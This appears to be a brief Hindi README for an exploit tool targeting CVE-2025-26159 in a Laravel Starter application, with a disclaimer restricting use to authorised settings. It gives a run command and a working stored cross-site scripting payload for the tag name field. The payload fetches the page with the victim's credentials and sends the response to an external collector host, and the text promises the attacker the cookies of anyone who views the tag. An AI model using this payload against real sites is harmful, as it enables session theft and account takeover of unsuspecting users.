
यह स्क्रिप्ट CVE-2025-26159 के शोषण के भाग के रूप में कुकीज़ को डिकोड, फ़िल्टर और एक्सट्रैक्ट करती है।
यह स्क्रिप्ट केवल अधिकृत वातावरण में उपयोग की जा सकती है जहाँ स्पष्ट अनुमति प्रदान की गई हो। लेखक इस स्क्रिप्ट के उपयोग से होने वाले किसी भी दुरुपयोग, क्षति या परिणामों के लिए जिम्मेदार नहीं है।
यह स्क्रिप्ट CVE-2025-26159 के शोषण के भाग के रूप में कुकीज़ को डीकोड, फ़िल्टर और निकालती है।
शोषण के चरणों को समझने के लिए मेरे ब्लॉग पर इस पोस्ट को देखें।
go run CVE-2025-26159.go
लारवेल स्टार्टर के टैग नाम फ़ील्ड में यह पेलोड डालें:
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>
जब कोई उपयोगकर्ता दुर्भावनापूर्ण टैग के विवरण पृष्ठ पर जाता है, तो आपको उसकी कुकीज़ प्राप्त होंगी।